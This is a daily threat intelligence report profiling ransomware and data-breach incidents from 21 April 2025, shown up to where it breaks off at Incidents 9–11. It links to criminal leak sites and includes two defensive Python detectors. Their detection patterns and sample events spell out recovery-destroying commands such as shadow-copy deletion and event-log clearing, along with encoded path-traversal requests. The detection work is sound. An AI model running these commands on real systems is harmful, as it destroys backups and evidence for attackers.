[April-21-2025] Daily Cybersecurity Threat Report

1. Introduction

This report provides a detailed analysis of significant cybersecurity incidents reported within the last 24 hours, focusing on threat actor activities, tactics, techniques, and procedures (TTPs), and potential impact. The information is derived from publicly available data and threat intelligence sources as of April 21, 2025. Analysis includes context on the threat actors involved, drawing upon external research to provide a comprehensive understanding of the evolving threat landscape.

2. Executive Summary

Overview: The past 24 hours witnessed a high volume of diverse cyber threat activity, dominated by Ransomware-as-a-Service (RaaS) operations employing double extortion tactics. Prominent actors included Qilin, Hunters International, LockBit 3.0, and Sarcoma, targeting organizations across North America, Europe, and Asia. Data breaches impacting various sectors (IT, Aviation, Finance, Consumer Electronics) were also prevalent, alongside initial access brokers offering pathways into corporate networks and hacktivist groups conducting defacements and disruptive attacks.

Key Trends: A continued reliance on RaaS models was observed, alongside the exploitation of known vulnerabilities and remote access services for initial entry. Data exfiltration remains a primary objective, underpinning double or triple extortion strategies. Newer ransomware groups like Sarcoma and NightSpire demonstrated continued activity, contributing to the dynamic threat landscape. Hacktivist activity, particularly from groups such as Anonymous Italia and Cyber shade unit, indicates ongoing geopolitical motivations influencing cyber operations.

Significant Incidents: Notable incidents include Qilin targeting financial services in Canada and real estate in the US, Hunters International hitting healthcare in Belgium, LockBit 3.0 impacting wholesale in Italy, Sarcoma targeting civil engineering in Brazil, and alleged major data breaches at DJI (Consumer Electronics, China) and EmiratesNBD (Banking, UAE). The sale of sophisticated malware designed for evasion and access brokering for corporate networks further highlights the active cybercriminal underground supporting these operations.

Table: Daily Incident Summary (April 21, 2025)

Victim Organization | Victim Industry | Victim Country | Threat Actor(s) | Incident Category
--- | --- | --- | --- | ---
Dominion Lending Centres – The Mortgage Source | Financial Services | Canada | Qilin | Ransomware
Unspecified Corporate Entities | N/A | Japan, EU, USA | b1gb0y75 | Initial Access
Finkel Technologies | Information Technology (IT) Services | Israel | Vortex | Data Breach
IndiGo | Airlines & Aviation | India | Machine1337 | Data Breach
Sinalisa Segurança Viária Ltda. | Civil Engineering | Brazil | Sarcoma | Ransomware
Pharma Force | Healthcare & Pharmaceuticals | Belgium | HUNTERS INTERNATIONAL | Ransomware
DJI | Consumer Electronics | China | R00TK1T ISC CYBER TEAM | Data Breach
Tutto Ufficio s.r.l. | Wholesale | Italy | LOCKBIT 3.0 | Ransomware
Brandwave | Marketing, Advertising & Sales | UAE | Cyber shade unit | Data Breach
Specialized School No. 155 | Education | Ukraine | Cyber shade unit | Data Breach
Proficient Industries (India) Pvt. Ltd. | Manufacturing & Industrial Products | India | Cyber shade unit | Data Breach
Unspecified French PrestaShop Site | E-commerce & Online Stores | France | Clawson | Initial Access
body-feeling.ru | Health & Fitness | Russia | Anonymous Italia | Defacement
N/A (Malware Sale) | N/A | N/A | Baldwin | Malware
EmiratesNBD | Banking & Mortgage | UAE | Machine1337 | Data Breach
Equipment Rental Platform | Business Supplies & Equipment | Brazil | Vortex | Data Breach
biteyko.ru | Software Development | Russia | Anonymous Italia | Defacement
Municipality of Ardon | Government Administration | France | NightSpire | Ransomware
Michelson Realty Company LLC | Real Estate | USA | Qilin | Ransomware
Fujita Health University | Hospital & Health Care | Japan | l33tfg | Data Breach
bestalp.ru | Building and construction | Russia | Anonymous Italia | Defacement
N/A (Tool Sale) | N/A | N/A | CloudByte | Malware

3. Detailed Incident Analysis

(The following section details each incident reported in the provided data.)

Incident 1: Dominion Lending Centres – The Mortgage Source falls victim to Qilin Ransomware

  • Victim: Dominion Lending Centres – The Mortgage Source (Financial Services, Canada) – dlcthemortgagesource.ca
  • Details: Claimed on 2025-04-21T13:45:54Z. Category: Ransomware. Network: Tor. The Qilin ransomware group claims to have exfiltrated data from this Canadian mortgage company, posting sample screenshots on their Tor-based leak site as proof of compromise.
  • Threat Actor Profile: Qilin (aka Agenda)
  • Background: Qilin emerged in July 2022, operating a Ransomware-as-a-Service (RaaS) platform [1]. The group is assessed to have Russian origins and has been actively recruiting affiliates, though reportedly excluding those operating within Commonwealth of Independent States (CIS) countries [3]. Qilin gained significant notoriety for attacks demanding substantial ransoms, such as the $50 million demand made against Synnovis, a UK pathology provider supporting NHS hospitals [2]. As a RaaS operation, Qilin provides its customizable ransomware (available in both Go and the increasingly popular Rust programming language) and infrastructure to affiliates, typically taking a 15-20% share of any ransom payments collected [4]. The use of Rust suggests an effort to create more performant and potentially evasive malware compared to older Go-based variants [2].
  • TTPs: Qilin employs a double extortion strategy, involving both the encryption of victim data and the exfiltration of sensitive files, threatening public release if the ransom is not paid [1]. Initial access is often gained through phishing emails [1] or by exploiting vulnerabilities in external remote services, such as Fortinet SSL VPN flaws [2], and public-facing applications, like CVE-2023-27532 in Veeam Backup & Replication software [2]. Affiliates are known to use valid credentials obtained via leaks or purchase [5], employ process injection for privilege escalation and evasion [5], create scheduled tasks for persistence [5], and utilize common offensive tools like Remote Monitoring and Management (RMM) software and Cobalt Strike beacons for command and control and deployment [4]. Lateral movement within compromised networks is achieved using tools like PsExec or leveraging SSH [2]. Privilege escalation may involve tools like Mimikatz [2]. To hinder recovery, Qilin operators delete logs and backups, including Volume Shadow Copies [1]. Encryption typically uses AES, ChaCha20, and RSA algorithms [2]. The ransomware payload offers customization options, allowing affiliates to tailor aspects like encryption modes and targeted processes/services [1].
  • Targets & Motivations: The primary motivation for Qilin is financial gain [2]. The group targets organizations globally and opportunistically across a wide range of sectors, including financial services, healthcare, manufacturing, education, and critical infrastructure [1]. This attack against a Canadian financial services company aligns with their established pattern of targeting organizations perceived as capable of paying significant ransoms [3].
  • Evidence:
    • Published URL: http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/view?uuid=75808897-ee44-3c46-ae03-fa31f1968d33
    • Screenshots: https://d34iuop8pidsy8.cloudfront.net/256dd93b-b491-431c-a4e2-00bd9dbbe412.png

Incident 2: Alleged sale of SMTP access

  • Victim: Unspecified corporate entities (Japan, EU, USA)
  • Details: Claimed on 2025-04-21T13:17:08Z. Category: Initial Access. Network: Openweb (xss.is forum). The threat actor, identified as “b1gb0y75”, is advertising the sale of Simple Mail Transfer Protocol (SMTP) access for corporate entities located in Japan, the European Union, and the United States on the xss.is cybercrime forum.
  • Threat Actor Profile: b1gb0y75
  • Background: The username “b1gb0y75” appears on xss.is, a known forum for cybercriminal activities. This individual likely operates as an Initial Access Broker (IAB), specializing in compromising and selling access to corporate resources. Their motivation is purely financial, providing the means for other threat actors to conduct subsequent attacks such as phishing, malware distribution, or Business Email Compromise (BEC). Specific details about this actor beyond their forum activity are not available from the provided research.
  • TTPs: The actor focuses on compromising mail servers or individual corporate email accounts to gain control over SMTP functionalities. This could be achieved through various methods, including credential stuffing attacks using breached passwords, targeted phishing campaigns against employees, exploitation of vulnerabilities in mail server software (e.g., Exchange Server, Postfix), or compromising third-party services that have delegated permissions to send emails on behalf of the corporation. The sale of this access occurs within the structured environment of underground forums.
  • Targets & Motivations: The motivation is financial gain through the sale of access. Targets are opportunistic; any corporate SMTP access that can be verified and sold holds value. The offering of access spanning multiple developed regions (Japan, EU, USA) suggests either broad, non-targeted scanning and exploitation efforts or access obtained through multiple unrelated compromises.
  • Evidence:
    • Published URL: https://xss.is/threads/136497/
    • Screenshots: https://d34iuop8pidsy8.cloudfront.net/d6176e26-878f-4382-b874-db630a9bfb17.png

Incident 3: Alleged data breach of Finkel Technologies

  • Victim: Finkel Technologies (Information Technology (IT) Services, Israel) – finkeltech.co.il
  • Details: Claimed on 2025-04-21T13:14:46Z. Category: Data Breach. Network: Telegram. A group calling itself “Vortex” has claimed responsibility for breaching the database of Finkel Technologies, an Israeli IT services company. The compromised data reportedly includes highly sensitive configuration and credential information: database usernames and passwords, JWT secret keys, application keys, Redis configuration details, mail server settings and credentials, AWS access credentials, and Pusher service keys.
  • Threat Actor Profile: Vortex
  • Background: Vortex appears to be a data breach and extortion group communicating and publishing claims via the Telegram messaging platform. The name “Vortex” is generic, and available research discussing cybersecurity concepts like the “vulnerability vortex” [6] or security products/companies named Vortex [9] does not provide specific intelligence on this threat actor group. Based on their actions, Vortex likely focuses on exploiting system weaknesses to steal sensitive data, which can then be used for extortion or sold on underground markets. Their motivations appear primarily financial.
  • TTPs: The TTPs likely involve exploiting vulnerabilities in web applications (e.g., SQL injection allowing database access, path traversal exposing configuration files) or misconfigured cloud infrastructure (e.g., publicly accessible AWS S3 buckets containing credentials, insecure API endpoints). Accessing and exfiltrating critical configuration files, environment variable stores, or directly dumping database contents containing secrets are key actions. Communication of the breach and potential data release occurs via their Telegram channel.
  • Targets & Motivations: The group is likely financially motivated, seeking to profit from the stolen data either through direct extortion of the victim or sale to other malicious actors. Targeting an IT services company in Israel could be opportunistic, driven by the discovery of a vulnerability, or potentially influenced by geopolitical factors, although there is no direct evidence for the latter. The specific data types claimed (AWS keys, database credentials, API keys) are extremely valuable as they can enable deeper network compromise, further attacks, or complete system takeover. The compromise of such foundational infrastructure credentials represents a severe security failure. This type of breach moves beyond typical PII theft and grants attackers the potential to manipulate the victim’s core operations and potentially impact their clients, highlighting critical risks in application security and secrets management.
  • Evidence:
    • Published URL: https://t.me/Vvorttexx/27
    • Screenshots: https://d34iuop8pidsy8.cloudfront.net/92b54f25-f896-445e-9a08-fd0acb9fdd8d.png
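As an added example (not from this report, and not tooling of any actor or vendor named in it), the following Python triages web server access logs for the request patterns that expose configuration files and secrets of the kind claimed in this incident: fetches of .env and similar files, and path traversal, including double-encoded forms. A 200 response with a body is escalated because the file was probably served. The log lines, IP addresses and paths are constructed.

```python
"""
Access-log triage for configuration-file exposure: flags requests for
secret-bearing files (.env, .git/config, config/*.php, ...) and path-traversal
attempts, and escalates when the server answered 200 with a body.
All log lines below are constructed samples.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Combined/common log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Files that typically hold exactly the secrets named in the claim
# (DB credentials, APP_KEY / JWT secrets, Redis, mail, AWS and Pusher keys).
SENSITIVE_FILE_PATTERNS = [
    re.compile(r"/\.env(\.\w+)?$"),                      # .env, .env.bak, .env.production
    re.compile(r"/\.git/"),                              # repository metadata and history
    re.compile(r"/\.aws/credentials$"),
    re.compile(r"/(config|configuration)(/[^/]+)?\.(php|ya?ml|json)$"),
    re.compile(r"/storage/logs/[^/]+\.log$"),            # framework logs leak stack traces
]
# ".." followed by a slash or end of string, not preceded by a path/word character
TRAVERSAL_RE = re.compile(r"(^|[^A-Za-z0-9.])\.\.(/|$)")

SAMPLE_LOG = """\
203.0.113.7 - - [21/Apr/2025:09:14:02 +0000] "GET /.env HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Apr/2025:09:14:03 +0000] "GET /.git/config HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Apr/2025:09:14:05 +0000] "GET /download?file=%2e%2e%2f%2e%2e%2f.env HTTP/1.1" 200 1843 "-" "curl/8.5"
198.51.100.23 - - [21/Apr/2025:09:20:11 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [21/Apr/2025:09:20:12 +0000] "GET /assets/app.js HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
192.0.2.55 - - [21/Apr/2025:10:02:40 +0000] "GET /files/..%252f..%252fconfig/database.php HTTP/1.1" 403 0 "-" "python-requests/2.31"
"""


def decode_path(raw, rounds=2):
    """Percent-decode repeatedly (catches %252e double encoding) and normalise slashes."""
    path = raw
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def classify(path):
    """Return the reasons a decoded path is suspicious (empty list if none)."""
    reasons = []
    if TRAVERSAL_RE.search(path):
        reasons.append("traversal")
    if any(p.search(path) for p in SENSITIVE_FILE_PATTERNS):
        reasons.append("sensitive_file")
    return reasons


def analyse(log_text):
    """One finding per suspicious request; severity reflects whether it likely succeeded."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_path(m["path"])
        reasons = classify(decoded)
        if not reasons:
            continue
        status = int(m["status"])
        served = status == 200 and m["size"] not in ("-", "0")
        findings.append({
            "ip": m["ip"], "time": m["time"], "path": m["path"], "decoded": decoded,
            "status": status, "reasons": reasons,
            "severity": "critical" if served else "medium",
        })
    return findings


def summarise(findings):
    """Per-source counts: several hits from one IP indicate a scanner or a targeted probe."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    results = analyse(SAMPLE_LOG)
    for f in results:
        print(f"[{f['severity']}] {f['ip']} {f['status']} {f['decoded']} ({', '.join(f['reasons'])})")
    print("per-source:", dict(summarise(results)))
```

A critical finding means the file contents should be assumed compromised: rotate every secret the file held and block dotfile and config paths at the web server, not just fix the traversal.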

Incident 4: Alleged sale of IndiGo flight ticket data

  • Victim: IndiGo (Airlines & Aviation, India) – goindigo.in
  • Details: Claimed on 2025-04-21T13:07:20Z. Category: Data Breach. Network: Openweb (xss.is forum). The threat actor “Machine1337” is advertising the sale of data allegedly obtained from IndiGo, a major Indian airline. The data is claimed to include fields such as CountryName, Message, DestinationPhone, and DeliveryTime, seemingly related to flight ticket notifications or delivery confirmations.
  • Threat Actor Profile: Machine1337
  • Background: This actor is active on the xss.is cybercrime forum and was also observed claiming a breach against EmiratesNBD bank (see Incident 15). A GitHub profile associated with the username “machine1337” indicates an interest in bug bounty hunting [13]. This background could suggest the actor possesses technical skills for vulnerability discovery, potentially now applying them for malicious financial gain. Their motivation appears to be financial, focusing on stealing and selling data. General research on threat actor profiling [14] or AI threats [18] did not yield specific information on Machine1337.
  • TTPs: The actor likely exploited vulnerabilities within IndiGo’s web applications, APIs (potentially related to booking confirmation or messaging systems), or associated databases. Methods could include SQL injection, API abuse, or exploiting misconfigurations. After exfiltrating the data, they are offering it for sale on an underground forum.
  • Targets & Motivations: Primarily financially motivated. The targeting appears opportunistic, focusing on large organizations (like IndiGo and EmiratesNBD) that possess customer data which can be monetized. The specific nature of the claimed data (CountryName, Message, DestinationPhone, DeliveryTime) might suggest access to a specific system, perhaps related to customer communications or SMS gateways, rather than the core passenger reservation system. The dual targeting of entities in India and the UAE might indicate a regional focus or simply reflect where vulnerabilities were found.
  • Evidence:
    • Published URL: https://xss.is/threads/136495/
    • Screenshots: https://d34iuop8pidsy8.cloudfront.net/c29e5a3f-2803-4a91-bdb5-e8fb598ad901.png

Incident 5: Sinalisa Segurança Viária Ltda. falls victim to Sarcoma Ransomware

  • Victim: Sinalisa Segurança Viária Ltda. (Civil Engineering, Brazil) – sinalisa.com.br
  • Details: Claimed on 2025-04-21T12:48:04Z. Category: Ransomware. Network: Tor. The Sarcoma ransomware group claims to have compromised this Brazilian civil engineering company, stating they have exfiltrated 43 GB of data. They have threatened to publish this data within 6 to 7 days if their demands are not met.
  • Threat Actor Profile: Sarcoma
  • Background: Sarcoma is a relatively new ransomware group that emerged in late 2023 or October 2024 [19]. Despite its recent appearance, it quickly established itself as a significant threat, reportedly compromising dozens of organizations within its first month of operation [19]. The group employs a double extortion model, involving both data encryption and data exfiltration [20]. Its precise origins and affiliations remain unclear [21]. The rapid rise of Sarcoma mirrors a trend where new RaaS groups quickly scale operations, possibly by leveraging leaked source code from other ransomware families or by forming partnerships within the cybercrime ecosystem [19].
  • TTPs: Sarcoma utilizes a double extortion approach, encrypting victim systems while also stealing sensitive data to increase leverage for ransom demands [20]. Initial access vectors reportedly include phishing emails, the exploitation of n-day vulnerabilities (previously disclosed but potentially unpatched flaws), and possibly supply chain intrusions [21]. Once access is gained, they may use Remote Monitoring and Management (RMM) tools for network discovery, employ defense evasion techniques, steal credentials, and exfiltrate data [23]. Exfiltration volumes can be significant (e.g., 40 GB claimed in another attack [23], 43 GB here). Like many modern RaaS operations, they likely target Windows, Linux, and VMware ESXi environments [22] and may utilize cloud storage platforms for data exfiltration [22]. Specific vulnerabilities potentially exploited by groups like Sarcoma include flaws in VPNs/firewalls (e.g., SonicWall CVE-2024-53704, FortiOS CVE-2024-4059) or even zero-day vulnerabilities [23].
  • Targets & Motivations: The group’s primary motivation is financial gain. Sarcoma appears to target organizations opportunistically across various sectors, including manufacturing, healthcare, finance, IT services, agri-food, and, as seen in this case, civil engineering [20]. Their victims have been observed across North America, Asia, and Europe [22]. The attack on a Brazilian civil engineering firm fits this opportunistic targeting profile. The short deadline threatened (6-7 days) is a common psychological pressure tactic used by ransomware groups.
  • Evidence:
    • Published URL: http://sarcomawmawlhov7o5mdhz4eszxxlkyaoiyiy2b5iwxnds2dmb4jakad.onion/
    • Screenshots: https://d34iuop8pidsy8.cloudfront.net/c58f5a55-a9ad-468e-8796-cd026b1ac79b.png

Incident 6: Pharma Force falls victim to HUNTERS INTERNATIONAL Ransomware

  • Victim: Pharma Force (Healthcare & Pharmaceuticals, Belgium) – pharmaforce.be
  • Details: Claimed on 2025-04-21T12:32:15Z. Category: Ransomware. Network: Tor. The Hunters International ransomware group has listed Pharma Force, a Belgian healthcare/pharmaceuticals company, on its leak site, claiming to have exfiltrated a substantial 645.7 GB of data.
  • Threat Actor Profile: HUNTERS INTERNATIONAL
  • Background: Hunters International emerged in October 2023 [26] and operates a RaaS model, likely with an 80/20 affiliate revenue split [26]. Significant code similarities (over 60%) exist between Hunters International’s Rust-based ransomware and that of the defunct Hive ransomware group [26]. While the group claims they purchased Hive’s source code rather than being a direct rebrand [26], the connection is strong, and underground forums sometimes refer to them using Hive’s name [28]. A key characteristic is their strong focus on data exfiltration, sometimes choosing not to encrypt victim systems at all and relying solely on the threat of leaking stolen data for extortion [26]. They utilize custom tools, including “Storage Software” for managing exfiltrated data metadata [28] and the “SharpRhino” backdoor, which masquerades as a legitimate tool [26]. There were indications the group might rebrand to “World Leaks” in January 2025, shifting entirely to data extortion [28].
  • TTPs: Hunters International employs double extortion tactics [26]. Initial access is achieved through various means, including exploiting known vulnerabilities (e.g., Oracle WebLogic flaws [27], Citrix Bleed CVE-2023-4966 [31], vulnerabilities in Fortinet [19], SonicWall [31], and Microsoft Exchange servers [31]), compromising RDP or VPN services [19], and phishing campaigns [31]. Their ransomware is written in Rust [26], uses ChaCha20-Poly1305 and RSA encryption [26], and typically appends .LOCKED or .lock extensions to encrypted files [26]. However, newer versions (v6+) may forgo file renaming and ransom notes entirely [28]. Lateral movement involves tools like PsExec [19], RDP [19], Plink, Impacket, and RMM tools like AnyDesk and TeamViewer [27]. They perform credential dumping using Mimikatz [19] or by extracting SAM and SYSTEM registry hives [32]. Other tools observed include AutoIt malware [27] and the China Chopper web shell [32]. They actively disable backup and recovery mechanisms [26]. Data exfiltration often targets cloud storage services like MEGA [27]. The group also utilizes an OSINT service to gather information on victims for enhanced extortion pressure [28]. Their malware targets Windows, Linux, and ESXi platforms [26].
  • Targets & Motivations: The group is financially motivated. They target organizations opportunistically across a wide spectrum of industries, including healthcare, manufacturing, finance, education, real estate, and energy [26]. Their operations have a global reach, with a significant number of victims in the United States and Europe [26]. They have stated prohibitions against attacking CIS countries and potentially Israel and Turkey [28]. Targeting a healthcare organization in Belgium aligns with their known operational patterns and industry focus [28]. The substantial volume of data claimed (645.7 GB) underscores their emphasis on data theft as a primary extortion lever. The potential evolution from Hive and the shift towards data-centric extortion signal the group’s adaptability, possibly driven by improved defenses against encryption or law enforcement focus on traditional ransomware infrastructure.
  • Evidence:
    • Published URL: https://hunters55rdxciehoqzwv7vgyv6nt37tbwax2reroyzxhou7my5ejyid.onion/companies/5073381248
    • Screenshots: https://d34iuop8pidsy8.cloudfront.net/b9cacbbd-a72e-45ef-a677-13343d282ba8.png

Incident 7: Alleged data breach of DJI

  • Victim: DJI (Consumer Electronics, China) – dji.com
  • Details: Claimed on 2025-04-21T12:07:42Z. Category: Data Breach. Network: Telegram. The group “R00TK1T ISC CYBER TEAM” claims to have breached and gained unauthorized access to DJI, a leading global drone manufacturer. They allege the exfiltration of a wide range of customer and order data, including names, order IDs, dates/times, tracking numbers, pricing, drone specifications, contact information, shipping details, and payment methods.
  • Threat Actor Profile: R00TK1T ISC CYBER TEAM
  • Background: This appears to be a hacktivist or cybercrime group operating via Telegram, with claims also reportedly appearing on dark web portals [33]. The name “R00TK1T” suggests an intent to project technical hacking capabilities. Their motivation for targeting DJI is currently unclear and could range from political (targeting a prominent Chinese technology company), financial (selling the valuable customer and potentially sensitive technical data), industrial espionage, or simply seeking notoriety by attacking a high-profile target.
  • TTPs: The claimed access and data exfiltration suggest methods beyond simple website attacks. Likely TTPs include exploiting vulnerabilities in DJI’s e-commerce platform, customer portals, supply chain systems, or associated APIs. Techniques such as SQL injection, cross-site scripting (XSS) leading to credential theft, exploiting API security flaws, or compromising administrative accounts could have been used. Data exfiltration would focus on accessing and copying customer databases, order management systems, and potentially payment processing information. Communication and claims are made via Telegram and potentially dark web forums.
  • Targets & Motivations: Targeting DJI, a global leader in drone technology headquartered in China, is significant. Motivations could be multi-faceted:
    • Hacktivism: A politically motivated attack against a major Chinese corporation, possibly related to geopolitical tensions or specific issues concerning drone usage or data privacy.
    • Financial: The stolen data (customer PII, order details, potentially payment info) is highly valuable on underground markets.
    • Industrial Espionage: Accessing drone specifications or other proprietary technical data could be a goal.
    • Notoriety: Successfully breaching a well-known technology company brings attention to the group.
    A breach impacting a company like DJI, especially involving sensitive customer data and potentially payment information, carries substantial risks, including financial losses, regulatory penalties, and severe reputational damage. The potential geopolitical dimension adds further complexity.
  • Evidence:
    • Published URL: https://t.me/R00TK1TOFF/823
    • Screenshots: https://d34iuop8pidsy8.cloudfront.net/d6dcebf9-3777-4ecf-9b73-8203d6e3247a.png, https://d34iuop8pidsy8.cloudfront.net/1daf1a85-5428-4fe7-8e7f-1ad6a2847f6a.png

Incident 8: Tutto Ufficio s.r.l. falls victim to LockBit Ransomware

  • Victim: Tutto Ufficio s.r.l. (Wholesale, Italy) – tuttoperlufficio.eu
  • Details: Claimed on 2025-04-21T11:21:01Z. Category: Ransomware. Network: Tor. The LockBit 3.0 ransomware operation claims to have compromised Tutto Ufficio s.r.l., an Italian wholesale company. The claim includes data exfiltration, with a threat to publish the stolen data within 13-14 days if the ransom is not paid.
  • Threat Actor Profile: LOCKBIT 3.0 (aka LockBit Black)
  • Background: LockBit has been one of the most prolific and dominant RaaS operations globally since its emergence in 2019 [34]. The LockBit 3.0 variant, also known as LockBit Black, appeared in June 2022 [36]. The group was known for the speed and stability of its ransomware, extensive customization options for affiliates, and a business-like approach [39]. In February 2024, a major international law enforcement action, Operation Cronos, significantly disrupted LockBit’s infrastructure, seized servers and cryptocurrency accounts, led to affiliate arrests, and publicly identified the alleged leader, Dmitry Khoroshev [35]. Despite this disruption, LockBit-branded attacks continue. This persistence is attributed to the decentralized nature of RaaS, the likely continued operation of independent affiliates, and the public leak of the LockBit 3.0 builder in September 2022, which allows other actors to create and deploy the ransomware [34].
  • TTPs: LockBit operates as a RaaS platform [34], typically employing double or triple extortion (encryption, data exfiltration, potential data sale/auction) [37]. Affiliates gain initial access through various vectors, including RDP exploitation [37], phishing campaigns [43], exploiting vulnerabilities in public-facing applications (e.g., Fortinet CVE-2018-13379, F5 BIG-IP CVE-2021-22986, Fortra GoAnywhere CVE-2023-0669, PaperCut CVE-2023-27350) [34], drive-by compromises [44], and the use of previously compromised valid accounts [44]. Post-access, common tools include Cobalt Strike, Metasploit, and Mimikatz for C2, exploitation, and credential theft [37], along with PowerShell Empire and PsExec for execution and lateral movement [34]. LockBit 3.0 ransomware features anti-analysis capabilities, such as requiring a specific password for execution [36], and often checks the system language to avoid encrypting systems in CIS countries [36]. It employs obfuscation techniques [36], deletes Volume Shadow Copies and event logs to hinder recovery and investigation [34], and terminates specific processes and services [36]. Encryption uses a combination of AES and RSA algorithms [34]. The ransomware has variants targeting Windows, Linux, VMware ESXi, and even macOS [34], and possesses worm-like self-propagation capabilities [37]. A LockBit 4.0 variant was reportedly under development following the takedown [43].
  • Targets & Motivations: LockBit’s primary motivation is financial gain [37]. Historically, the group and its affiliates have targeted organizations globally across virtually all sectors, including critical infrastructure, manufacturing, finance, healthcare, and government [35]. They have hit both small-to-medium businesses (SMBs) and large enterprises [43]. This attack on an Italian wholesale company is consistent with their broad, opportunistic targeting strategy. The continued appearance of LockBit 3.0 attacks post-takedown underscores the challenge of dismantling decentralized cybercrime operations. While the core group’s operational capacity is likely diminished, the availability of the leaked builder means the malware itself remains a threat, wielded by potentially independent actors or other groups. Defenses must remain focused on the known TTPs associated with the malware, irrespective of the current status of the original leadership.
  • Evidence:
    • Published URL: http://lockbit7ouvrsdgtojeoj5hvu6bljqtghitekwpdy3b6y62ixtsu5jqd.onion/post/yocIn5yrx5m8bunl6806172ae7cb2
    • Screenshots: https://d34iuop8pidsy8.cloudfront.net/ea76f1bf-667e-439d-bc6a-182d1f2e6aa6.png
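The recovery-inhibition steps that this report attributes to LockBit 3.0 (this incident), Qilin (Incident 1) and Hunters International (Incident 6) are a reliable pre-encryption signal: shadow copy deletion, backup catalog removal, disabling boot recovery, event log clearing and scheduled-task persistence. The Python below, an added example that is not from the report nor from any actor or vendor named in it, matches those commands in Sysmon-style process-creation events and correlates distinct hits per host within a short window. The event fields and sample events are constructed.

```python
"""
Detect recovery-inhibition, log-clearing and scheduled-task persistence
commands in process-creation telemetry and correlate them per host.
Event shape (UtcTime, Computer, User, Image, CommandLine) mirrors Sysmon
Event ID 1; the JSON-lines sample below is constructed, not real telemetry.
"""
import json
import re
from datetime import datetime, timedelta

# (rule name, regex applied to the lower-cased, whitespace-normalised command line)
RULES = [
    ("vss_delete", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b")),
    ("vss_resize", re.compile(r"\bvssadmin(\.exe)?\b.*\bresize\b.*\bshadowstorage\b")),
    ("wmic_shadowcopy_delete", re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b")),
    ("bcdedit_recovery_off", re.compile(
        r"\bbcdedit(\.exe)?\b.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)")),
    ("wbadmin_catalog_delete", re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\b.*\bcatalog\b")),
    ("eventlog_clear", re.compile(r"\bwevtutil(\.exe)?\b.*\b(cl|clear-log)\b")),
    # A new task whose action lives in a user-writable directory is a common persistence shape
    ("schtasks_userpath", re.compile(
        r"\bschtasks(\.exe)?\b.*/create\b.*\\(appdata|programdata|temp|users\\public)\\")),
]
CORRELATION_WINDOW = timedelta(minutes=10)

SAMPLE_JSONL = r"""
{"UtcTime": "2025-04-21 03:12:07", "Computer": "FS01", "User": "CORP\\svc_backup", "Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin.exe delete shadows /all /quiet"}
{"UtcTime": "2025-04-21 03:12:09", "Computer": "FS01", "User": "CORP\\svc_backup", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "CommandLine": "wmic shadowcopy delete"}
{"UtcTime": "2025-04-21 03:12:11", "Computer": "FS01", "User": "CORP\\svc_backup", "Image": "C:\\Windows\\System32\\bcdedit.exe", "CommandLine": "bcdedit /set {default} recoveryenabled No"}
{"UtcTime": "2025-04-21 03:12:15", "Computer": "FS01", "User": "CORP\\svc_backup", "Image": "C:\\Windows\\System32\\wevtutil.exe", "CommandLine": "wevtutil.exe cl Security"}
{"UtcTime": "2025-04-21 08:00:00", "Computer": "WS17", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /create /tn Updater /tr C:\\Users\\jdoe\\AppData\\Roaming\\upd.exe /sc minute /mo 5"}
{"UtcTime": "2025-04-21 09:30:00", "Computer": "WS02", "User": "CORP\\admin", "Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin list shadows"}
"""


def load_events(jsonl):
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def match_rules(command_line):
    """Names of every rule the command line triggers (empty list if benign)."""
    cmd = re.sub(r"\s+", " ", command_line).strip().lower()
    return [name for name, rx in RULES if rx.search(cmd)]


def triage(events, window=CORRELATION_WINDOW):
    """host -> {severity, rules, events}. Two or more distinct rules on one host
    inside the window is the pre-encryption pattern (high); a lone hit is medium."""
    hits = {}
    for ev in events:
        for rule in match_rules(ev["CommandLine"]):
            when = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")
            hits.setdefault(ev["Computer"], []).append((when, rule, ev))
    report = {}
    for host, items in hits.items():
        items.sort(key=lambda h: h[0])
        best = 0
        for i, (start, _, _) in enumerate(items):       # sliding window from each hit
            in_window = {r for t, r, _ in items[i:] if t - start <= window}
            best = max(best, len(in_window))
        report[host] = {
            "severity": "high" if best >= 2 else "medium",
            "rules": sorted({r for _, r, _ in items}),
            "events": [e for _, _, e in items],
        }
    return report


if __name__ == "__main__":
    for host, info in triage(load_events(SAMPLE_JSONL)).items():
        print(f"{host}: {info['severity']} -> {', '.join(info['rules'])}")
        for ev in info["events"]:
            print(f"    {ev['UtcTime']} {ev['User']}: {ev['CommandLine']}")
```

Backup agents legitimately resize shadow storage or list shadows, so baseline the accounts and hosts that run these commands before alerting on single hits; the correlated pattern rarely has a benign explanation.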

Incidents 9, 10, 11: Cyber shade unit targets Brandwave, Specialized School No. 155, Proficient Industries (India) Pvt. Ltd.

  • Victims:
    • Brandwave (Marketing, Advertising & Sales, UAE) – brandwave.ae
    • Specialized School No. 155 (Education, Ukraine) – sch-155.com.ua
    • Proficient Industries (India) Pvt. Ltd. (Manufacturing & Industrial Products, India) – proficientindustries.in
